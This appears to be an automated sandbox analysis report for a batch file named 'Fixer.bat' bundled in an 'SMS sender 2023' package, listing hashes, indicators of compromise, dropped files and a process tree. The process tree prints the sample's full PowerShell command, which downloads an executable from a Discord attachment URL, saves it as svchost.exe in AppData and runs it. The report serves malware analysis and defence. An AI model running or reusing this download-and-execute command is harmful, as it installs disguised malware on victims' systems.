920ee4d6e16da14af70de3df554004024590cd31ac4b57c5338761b7838b3291

Resubmissions

02/02/2024, 15:59

240202-te4t8scbdp 10

02/02/2024, 15:54

240202-tcesbscahk 10

Analysis

max time kernel
118s
max time network
118s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
02/02/2024, 15:59

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

SMS sender 2023/SMS sender 2023/Fixer.bat
Size

2KB
MD5

f270d92aa6bc1f8e856de4671e0d8e11
SHA1

18f9bd65e741b75e46bb3bf5574043a619148138
SHA256

bc1d78f54d3aedc89745d2703cdc78d89a852d930d180088a85f212683ecb5f7
SHA512

ec90fa4d06c843d252aef4c816175a6c9cf03de8f1e900bf529147da1398561c71099d24d52cef5122e0c0812216a37d17d7b9f27f7fd05c073ddf21a7f1dd5f

Score

5^/10

Malware Config

Signatures

Drops file in System32 directory 12 IoCs

description	ioc	Process
File created	C:\Windows\system32\perfc007.dat	lodctr.exe
File created	C:\Windows\system32\perfh007.dat	lodctr.exe
File created	C:\Windows\system32\perfh009.dat	lodctr.exe
File created	C:\Windows\system32\perfc00C.dat	lodctr.exe
File created	C:\Windows\system32\perfh011.dat	lodctr.exe
File created	C:\Windows\system32\perfc009.dat	lodctr.exe
File created	C:\Windows\system32\perfc00A.dat	lodctr.exe
File created	C:\Windows\system32\perfh00A.dat	lodctr.exe
File created	C:\Windows\system32\perfh00C.dat	lodctr.exe
File created	C:\Windows\system32\perfc010.dat	lodctr.exe
File created	C:\Windows\system32\perfh010.dat	lodctr.exe
File created	C:\Windows\system32\perfc011.dat	lodctr.exe

Suspicious behavior: EnumeratesProcesses 1 IoCs

pid	Process
2512	powershell.exe

Suspicious use of AdjustPrivilegeToken 1 IoCs

description	pid	Process
Token: SeDebugPrivilege	2512	powershell.exe

Suspicious use of WriteProcessMemory 9 IoCs

description	pid	Process	procid_target
PID 1732 wrote to memory of 2920	1732	cmd.exe	29
PID 1732 wrote to memory of 2920	1732	cmd.exe	29
PID 1732 wrote to memory of 2920	1732	cmd.exe	29
PID 1732 wrote to memory of 2512	1732	cmd.exe	30
PID 1732 wrote to memory of 2512	1732	cmd.exe	30
PID 1732 wrote to memory of 2512	1732	cmd.exe	30
PID 1732 wrote to memory of 2700	1732	cmd.exe	31
PID 1732 wrote to memory of 2700	1732	cmd.exe	31
PID 1732 wrote to memory of 2700	1732	cmd.exe	31

C:\Windows\system32\cmd.exe
cmd /c "C:\Users\Admin\AppData\Local\Temp\SMS sender 2023\SMS sender 2023\Fixer.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:1732
- C:\Windows\system32\mode.com
  MODE CON COLS=30 LINES=2
  2⤵
  PID:2920
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  powershell -C start-BitsTransfer -priority foreground -Source https://cdn.discordapp.com/attachments/711838517176696884/904872660025094164/Requieremnts.exe -Destination $Env:appdata/svchost.exe -ErrorAction SilentlyContinue;sleep 7;start $Env:appdata/svchost.exe"
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  PID:2512
- C:\Windows\system32\lodctr.exe
  lodctr /r
  2⤵
  - Drops file in System32 directory
  PID:2700

Network

MITRE ATT&CK Matrix

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Windows\System32\perfc007.dat

Filesize
46KB

MD5
403ed3fa2dafb68f769ef346e7dbb70b

SHA1
1785d48a9674c61769ef77862a9714de56484065

SHA256
acb0e93b08df06734ec451db06d559e7323273bc7adbe168dc9137ab4965edc8

SHA512
c00864196ee3b5c033dfed108460118e9548850f5cd28010539b6308fabc252dbfbdf0a8a90e43786bc74905ca53a547f75e8c858d76d138d7abc2c8ff3f5dee

Download Submit
C:\Windows\System32\perfc00A.dat

Filesize
48KB

MD5
1ce630beaa18ba4e0d28cab57bf09be2

SHA1
388e7d917936f015506c1d6660cfd922cc238eb7

SHA256
efe728e2549ffb80654bf3afec80045dbd0d65d4c71faff75928f5c7a4da98a8

SHA512
4c2e047bf4ce50bab7bb0e418ea7d7146622d2d401ebd4ce9a020d36c4bff4c0911da7906d331c0efed44dd0bdfc9a9c1b230c333441b83883e7edf8bd9d7f06

Download Submit
C:\Windows\System32\perfc00C.dat

Filesize
45KB

MD5
f0eab6597799f6077aa033b570532c28

SHA1
21c6a35a640b45020874ddc7c94d5d21a8f8c08c

SHA256
a9e2cf87a7d66f2e36fbb5f020b3702cee96d95796c631e2c22aaec5682c57a5

SHA512
b8f8931939a65caba3c46f312a7c37c37044b8960e9c374b861acfd9ba4b9c1c8ec131459c731b1ce874f712ba197d75a1c2420e2f64de30fa03ebbe67ff1d05

Download Submit
C:\Windows\System32\perfc010.dat

Filesize
45KB

MD5
2091cc419a5e1a6b8b1106755623e883

SHA1
b439988b3c27e9e7127746fe5e7fc2d5c335b31c

SHA256
bd02365cdb3df057dec854be4bef0df5d82f96f4de677ed93e22ee400497fa09

SHA512
f9b659e7d1306f382f69a31835db75973ecbd178992750bf75108a45355102767a92f0e51d36ba172b090937db9d798f4b74f885b15e4e15ab2c2e0c27ca9f60

Download Submit
C:\Windows\System32\perfc011.dat

Filesize
37KB

MD5
812132773b8225ab1d3816668e59dc60

SHA1
96ad0a2900076496db4455c1e26756a7125908e0

SHA256
f791d8ed1fad9ed6dab6b999941bbfc69b850dc30cfc0b8f9674d4454d3d605e

SHA512
bae6942b28df1936966b40661700afb7447a13122b0dd606092cf968981a7b2fff24d2b6039bb55a6a6ccbe3e8a132d822d3847d822a695319f6e3413c26cb3f

Download Submit
C:\Windows\System32\perfh007.dat

Filesize
313KB

MD5
3b68eaa51d4628e4900bfec5a232a606

SHA1
11f4be086192c8b73649886cdb53ad412281da0d

SHA256
719d7ade061a265025e4b539e49b92818f06ef29b00cdf6fa93c2981aa317c61

SHA512
3491acfaf021a22f25fcdcb8a98fc3386163586b3c6e983c970fd72a260aba6ae0988b71e65168e3106eeef0a10afacf0cf783ad92e0bbd082bbd2bbb515c8eb

Download Submit
C:\Windows\System32\perfh009.dat

Filesize
307KB

MD5
214aaee4a83a3b135078be8e59eb84f9

SHA1
b3832a25886499c991af6efb52eae83eb43cefb4

SHA256
dca88f59ef3dc487e6556b5d64f0bcd4ec40afcea77ff1975f74006ef695b831

SHA512
506bfedfc74813c3997b9be14b07fbb44568beb931553f1cd863da58140cac6154025db370117fec2db5e59522b154671732173f9e034c1a2e87fd3077d2ee96

Download Submit
C:\Windows\System32\perfh00A.dat

Filesize
354KB

MD5
a4149c36b9d5e65068e6cdd01b542d89

SHA1
64462fb9fd5e66bac11d818df5a91ebb16f2477f

SHA256
c8fceb584f4c3ba93a16a681051b706ac7588bde9ec2adcffb63b2047b33907e

SHA512
47ec8e4051117f79845d493e8a9b574c2f1461c0625379ca6a21c417564cfda6b509333d6fed424ad606180ce28d74e07900f30184aeae27d421e60da950bc02

Download Submit
C:\Windows\System32\perfh00C.dat

Filesize
357KB

MD5
8e7c686a02055181c9b75e0fe01a4fd7

SHA1
47de49c726793ffd287549fad01926b17b289ac7

SHA256
e2f8d004efded63b5da0821a58147afa565c8411d2bc274fdabbbd4d488d549b

SHA512
d7ef9235e6af563641be033f471ce5829c61414b86303ee3222f7db727bea38915c47d685170fedeacdd1632803674a301a2ee8d73de4f8cb90f6523a61bbc11

Download Submit
C:\Windows\System32\perfh010.dat

Filesize
352KB

MD5
c5d86b9f355e225daf292ce2fcadc028

SHA1
60d4cbb0b11b24f1f452ca30ca5b3245db4ee098

SHA256
0213467420d88b2bbbe92ac3eb4a1e92e5732b66552a3d811523d1a1475f4bb3

SHA512
dfce590dc804bff43880c1a4f2b25252ecefc7bb3063ad0da68b5337b0d3e5037b17f0f0f99eb17d33af7983a8c2e71e1f6033f74d03cfeff6066f9bf5e5ed12

Download Submit
C:\Windows\System32\perfh011.dat

Filesize
154KB

MD5
782187cd914885ed571b3dca1c60c53f

SHA1
a608aada89c4ef3bace57805965e80855bdedce5

SHA256
a74bd71d1c4ce22b988a8ecfbd20fc7f12eda88f1a3a562fbb990f0c31a92ade

SHA512
fa0b4fe4de5daac87e44f5605e4c600c6b884aae060c89bba6c6b237fee9c22b811df7174bf5efa45d50e9f1ae221b70ff771008589c7e1ed9f58d68eee91fb5

Download Submit
memory/2512-11-0x000007FEF5310000-0x000007FEF5CAD000-memory.dmp

Filesize
9.6MB

Download
memory/2512-4-0x000000001B780000-0x000000001BA62000-memory.dmp

Filesize
2.9MB

Download
memory/2512-8-0x000007FEF5310000-0x000007FEF5CAD000-memory.dmp

Filesize
9.6MB

Download
memory/2512-9-0x0000000002A50000-0x0000000002AD0000-memory.dmp

Filesize
512KB

Download
memory/2512-10-0x0000000002A50000-0x0000000002AD0000-memory.dmp

Filesize
512KB

Download
memory/2512-7-0x0000000002A50000-0x0000000002AD0000-memory.dmp

Filesize
512KB

Download
memory/2512-6-0x000007FEF5310000-0x000007FEF5CAD000-memory.dmp

Filesize
9.6MB

Download
memory/2512-5-0x0000000001D80000-0x0000000001D88000-memory.dmp

Filesize
32KB

Download